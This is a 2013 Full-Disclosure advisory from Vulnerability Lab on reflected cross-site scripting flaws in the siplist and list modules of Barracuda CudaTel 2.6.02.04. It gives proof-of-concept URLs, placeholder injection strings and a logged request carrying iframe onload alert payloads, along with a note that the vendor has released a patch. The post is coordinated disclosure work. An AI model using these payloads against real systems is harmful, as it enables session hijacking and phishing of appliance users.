[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-06-27 23:50:26
Message-ID: 51CCCFC2.3000207 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
Date:
=====
2013-06-25
References:
===========
http://vulnerability-lab.com/get_content.php?id=778
BARRACUDA NETWORK SECURITY ID: BNSEC-811
VL-ID:
=====
778
Common Vulnerability Scoring System:
====================================
2.5
Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is \
an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication \
Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, \
conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use \
Web interface. CudaTel Communication Server is compatible with any SIP device and provider, \
and can be pre-configured for use with both analog and digital telephone networks. Powerful, \
Complete Solution With an expansive feature set and and no per user or phone licensing fees, \
the CudaTel Communication Server is equipped and priced for organizations of any size. Native \
High Definition audio support and integrated phone line (TDM) hardware produces an \
unparalleled audio experience. VOIP encryption protects calls from hackers and digital \
eavesdroppers.
(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple client side vulnerabilities in \
the Barracuda Networks CudaTel v2.6.002.040 appliance application.
Report-Timeline:
================
2012-11-27: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-28: Vendor Notification (Barracuda Networks Security - Bug Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security - Bug Bounty Program)
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]
2012-06-25: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple client side input validation vulnerabilities are detected in the Barracuda Networks \
CudaTel v2.6.002.040 appliance application. The non-persistent vulnerabilities allows an \
attacker (remote) to manipulate client side application to browser requests.
The vulnerability (client side) is located in the siplist and list module when processing to \
request manipulated bbx_provider_gateway_name, bbx_provider_gateway_username or \
bbx_provider_gateway_host parameter listing.
Exploitation of the vulnerability requires medium application user interaction. Successful \
exploitation of the vulnerability results in client side phishing, client side session \
hijacking, client side external redirects to malware or evil websites and client side module \
context manipulation(cache).
Vulnerable Module(s):
[+] siplist - Listing
[+] list - Listing
Vulnerable Parameter(s):
[+] bbx_provider_gateway_name
[+] bbx_provider_gateway_username
[+] bbx_provider_gateway_host
Proof of Concept:
=================
The client side input validation vulnerabilities can be exploited by remote attackers without \
required application user account and with medium or high required user interaction. For \
demonstration or reproduce ...
Path:
gui/gateway/siplist
gui/gateway/list
Parameter:
undefined, bbx_provider, rows, page & searchstring
Values:
bbx_provider_gateway_name, bbx_provider_gateway_username & bbx_provider_gateway_host
Review: List
<pre>---
count: 1
list:
-
bbx_domain_id: 6
bbx_extension_block_begin: 2008
bbx_extension_block_end: 2008
bbx_extension_id: 26
bbx_extension_id_primary: 26
bbx_extension_rcd: 2012-11-26 15:58:45.413912
bbx_extension_rpd: 2012-11-26 15:58:45.413912
bbx_extension_value: 2008
bbx_queue_id: 12
flag_auto_provision: 0
flag_external: 0
flag_locked: 0
flag_primary: 1
flag_standalone: 1
flag_super: 0
flag_voicemail: 0​​​​​
show_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
sort_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"​​​​​
type: queue
page: 1
rows: 25
</pre>
Review: SipList
<pre>---
count: 4
page: 1
rows: 30
siplist:
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: \
​​​​​"\">/\"/'\"​​​​​<[PERSISTENT \
INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_id: 22
bbx_provider_gateway_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: REFRESH
bbx_provider_gateway_username: "\">/\"/'\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_gateway_id:="" 23=""
bbx_provider_gateway_name:="" <[PERSISTENT INJECTED SCRIPT CODE!];)"
<="" <iframe="">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
bbx_provider_gateway_port: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_name: PSTN Gateway
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: "\"<h1>test</h1>"
bbx_provider_gateway_id: 21
bbx_provider_gateway_name: \\"<[PERSISTENT INJECTED SCRIPT CODE!]>
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: ~
bbx_provider_gateway_username: "\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: test.com
bbx_provider_gateway_id: 20
bbx_provider_gateway_name: test
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: test
bbx_provider_name: Generic SIP
</pre></body></html></iframe></[PERSISTENT INJECTED SCRIPT CODE!]")<></iframesrc=a></pre>
PoC:
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=%3C[PERSISTENT \
INJECTED SCRIPT CODE!]&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=%3C[PERSISTENT \
INJECTED SCRIPT CODE!]
http://cudatel.ptest.cudasvc.com/gui/gateway/list?
_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/list?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=[PERSISTENT INJECTED \
SCRIPT CODE!]%20%3C&sortorder=asc&searchstring=
ALL:
cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=<[PERSISTENT INJECTED \
SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT \
CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<
cudatel.ptest.cudasvc.com/gui/gateway/list?_=1354065786075&undefined=<[PERSISTENT INJECTED \
SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT \
CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<
Request(s):
2:30:07.550[851ms][total 9418ms] Status: 200[OK]
GET http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=%3Ciframe%20src=a%3E
%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&rows=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=
a%20onload=alert(%22VL%22)%20%3C
&page=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortby=bbx_provider_gateway_name=
%3Ciframe%20src=a%3E%20%20%20%20
%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortorder=asc&searchstring=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe
%20src=a%20onload=alert(%22VL
%22)%20%3C Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1833] \
Mime Type[text/html] Request Header:
Host
[cudatel.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Cookie[cookietest=1; bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6]
Response Header:
Date[Wed, 28 Nov 2012 01:30:08 GMT]
Server[BarracudaHTTP 2.0/2.2.10 (Unix) mod_auth_pgsql/2.0.3 \
mod_fastcgi/mod_fastcgi-SNAP-0811090952 mod_ssl/2.2.10 OpenSSL/0.9.8x mod_perl/2.0.2 \
Perl/v5.8.8]
Vary[Content-Type]
Set-Cookie[bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6; path=/]
Content-Length[1833]
Cache-Control[must-revalidate]
Expires[Thu, 28 Nov 2013 01:30:08 GMT]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[text/html]
Reference(s):
cudatel.ptest.cudasvc.com/gui/gateway/siplist
cudatel.ptest.cudasvc.com/gui/gateway/list
Solution:
=========
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]
Note: The upgrade is available to all customer of the appliance module and can be done \
automatic or manually in the customer center of barracuda networks.
Risk:
=====
The security risk of the (multiple) client side input validation vulnerabilities in the siplist \
and list module are estimated as medium.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - \
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - \
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to \
get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic